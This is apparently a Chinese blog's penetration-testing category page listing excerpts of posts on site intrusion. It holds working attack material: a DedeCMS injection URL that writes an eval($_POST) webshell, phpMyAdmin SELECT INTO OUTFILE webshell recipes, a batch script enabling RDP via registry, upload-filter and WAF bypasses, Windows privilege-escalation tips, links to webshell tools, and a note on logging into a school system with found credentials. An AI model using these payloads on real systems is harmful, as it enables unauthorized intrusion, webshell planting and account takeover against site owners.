随笔分类 - 渗透测试
渗透测试的一些总结
摘要:今天听了大牛们的各种讲解,心里感触特别深刻,作为一名渗透新手,我总结一些渗透技巧1、 原理是关键你可以看这些书,务必仔细的阅读,只有深刻理解才能成为大牛A、 SQL注入攻击与防御B、 上传漏洞攻击与防御C、 XSS跨站脚本攻击与防御D、 命令执行漏洞攻击与防御E、 Kali渗透测试实战F、 Sqlm...
阅读全文
Windows2003 Webshell默认权限
摘要:0×00 前言0×01 Windows2003默认配置0×02 Windows2003典型配置的权限0×03 cmd运行的条件0×00 前言这一章主要讲解关于我们刚拿到webshell的默认权限,这一章主要集中一下,我们常常要入侵所拿下一个网站的权限后,得到的所谓webshell,他到底在windo...
阅读全文
webshell三剑客[aspxspy、phpspy、jspspy]
摘要:ASPSPY:http://www.rootkit.net.cn/article.asp?id=132下载:ASPXspy2JSPSPY:http://www.forjj.com/?action=show&id=138 下载:jspspyPHPSPY:http://www.4ngel.net/pro...
阅读全文
SQL注入中的WAF绕过技术
摘要:目录1.大小写绕过2.简单编码绕过3.注释绕过4.分隔重写绕过5.Http参数污染(HPP)6.使用逻辑运算符or /and绕过7.比较操作符替换8.同功能函数替换9.盲注无需or和and10.加括号11.缓冲区溢出绕过1. 大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了un...
阅读全文
深入理解SQL注入绕过WAF与过滤机制
摘要:知己知彼,百战不殆 --孙子兵法[目录]0x0 前言0x1 WAF的常见特征0x2 绕过WAF的方法0x3 SQLi Filter的实现及Evasion0x4 延伸及测试向量示例0x5 本文小结0x6 参考资料0x0 前言促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异...
阅读全文
xp/2003开关3389指令
摘要:开启3389:@echo offtitle 开启3389clsrem 开启3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >nulecho.echo 提示你:3389已经开启关闭3389:echo rem 关闭3389reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Term
阅读全文
GOOGLE HACK
摘要:intext:关键字把网页正文内某个关键字作为搜索条件-------------------intitle:关键字把网页标题内某个关键字作为搜索条件-------------------inurl:关键字搜索含有关键字的url地址-------------------link:关键字查找与关键字做了链接的url地址-------------------site:域名返回域名中所有url地址-------------------filetype:文件名.后缀名搜索特定的文件-------------------cache:搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦。---
阅读全文
phpmyadmin后台4种拿shell方法 && php爆路径大法
摘要:php后台拿shell要知道php的路径,文章下面将讲诉爆php路径的方法!!!方法一:CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('');SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';----以上同时执行,在数据库: mysql 下创建一个表名为:xss,字段为xss1,导出到D:/www/x.php一句话连接密码:xiaoma方法二:Creat
阅读全文
Modify Headers模拟不同地域进行网页测试
摘要:今天要简单讲一下Modify Headers这个Firefox插件,记录一下我是怎么使用它的。Modify Headers:https://addons.mozilla.org/zh-CN/firefox/addon/modify-headers/简单的说,这个插件的主要作用是对Firefox的HTTP request headers进行添加、修改和过滤等操作。当我们访问网站的时候,某些网站服务器会对访问网站的浏览器Header信息进行判断,然后决定用什么方式把网站内容呈现给浏览器。服务器也会根据浏览器的header中包含的其他信息(譬如浏览器所在的IP地址)判断是否要讲某一特定的信息呈现给浏
阅读全文
DEDECMS之0day入侵总结
摘要:1.查看dedecms最后升级版本:http://xxx.com/data/admin/ver.txt2.利用网上公开之0day进行对应版本之入侵ps:dedecms默认CMS后台:http://xxx.com/dede/
阅读全文
日志文件入侵总结
摘要:1.判断网站是否有log路径2.找到日志文件路径:jwc.xxx.com/log/2014-03-18-log.txt3.找到账户为jwc01的密码password4.登录教务系统
阅读全文
dedecms入侵拿webshell之方法总结
摘要:1、注入漏洞存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>注入成功,产生了注入文件。http://localhost:802/data/mysql_error_trace.php一句话木马连接上传大马即
阅读全文
SqlMap之数据库操作语句总结
摘要:SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。#> ./sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库#>...
阅读全文
WINXP上安装及使用SqlMap之方法
摘要:1、首先下载SqlMap点击下载。2、其次下载用于Windows系统的Python ……点击这里……3、然后安装Python:Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”OK … :)4、解压SqlMap.zip里面的文件…5、找到你安装python的目录(对于我来说:C:\Python27中)6、现在,在python文件夹中创建一个新的文件夹,并命名为“SqlMap”7、然后把你刚才解压的SqlMap中的文件全部复制到C:\Python27\sqlmap文件夹里面8、最后在桌面空白处右键创建一个新的快捷方式:并命名为“Sql
阅读全文
sqlmap原理及使用方法
摘要:1 。 介绍1.1 要求1.2 网应用情节1.3 SQL 射入技术1.4 特点1.5 下载和更新sqlmap1.6 执照2 。 用法2.1 帮助2.2 目标URL2.3 目标URL 和verbosity2.4 URL 参量2.5 Google dork2.6 HTTP 方法: 得到或张贴2.7 张贴的数据串2.8 HTTP 曲奇饼倒栽跳水2.9 HTTP 用户代理倒栽跳水2.10 任意HTTP 用户代理倒栽跳水2.11 HTTP 认证2.12 HTTP 代理人2.13 串比赛2.14 遥远的数据库管理系统2.15 广泛的DBMS 指印2.16 横幅2.17 当前的用户2.18 当前的数据库2.
阅读全文
nmap原理及使用方法
摘要:NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。1简介nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统保安。正如大多数被用于网络安全的工具,nmap 也是不少黑客及骇客(又称脚本小孩)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus混为一谈。Nma
阅读全文
windows服务器提权前请先执行systeminfo命令
摘要:pr、巴西烤肉 对应补丁好多朋友见到Windows服务器就祭出pr、巴西烤肉一气搞,忙完免杀又忙找可写目录,最后发现服务器打上了对应的补丁。笔者在提权前都会执行systeminfo命令,查看对应补丁有没打上。PR对应补丁号: KB952004巴西烤肉对应补丁号:KB956572
阅读全文
nmap速查表v1.0
摘要:基本语法:#nmap [扫描方式] [命令选项] {目标}扫描目标格式:IPv4 地址: 192.168.1.1IPv6 地址:AABB:CCDD::FF%eth0主机名:www.target.tgtIP 地址范围:192.168.0-255.0-255掩码格式:192.168.0.0/16使用列表文件:-iL 设置扫描端口无端口范围时扫描1000 个常用端口-F 扫描100个最常用端口-p- 指定端口范围-p,,…. 端口列表-pU:53,U:110,T20-445 TCP&UDP结合-r 线性扫描(不是随机扫描)–top-ports 扫描n个最常用端口-p-65535 忽略初始端.
阅读全文
新手入侵笔记
摘要:【 拿shell 】1.直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就利用IIS6.0解析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls2.上传图片木马遇到拦截系统,连图片木马都上传不了,记事本打开图片木马在代码最前面加上gif89a,一般就能逃过拦截系统了。3.上传图片木马把地址复制到数据库备份里备份成asp木马,有时不成功就利用IIs6.0解析漏洞尝试突破。4.上传图片木马再用抓包工具进行抓包,用明小子的综合上传功能,复制上传地址及cookies填到对应的框里,点击上传即可。5.当后台有数据库备份
阅读全文
新手提权笔记
摘要:【 web提权 】1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。4.cmd命令:systeminfo,看看有没有KB952004、KB95657
阅读全文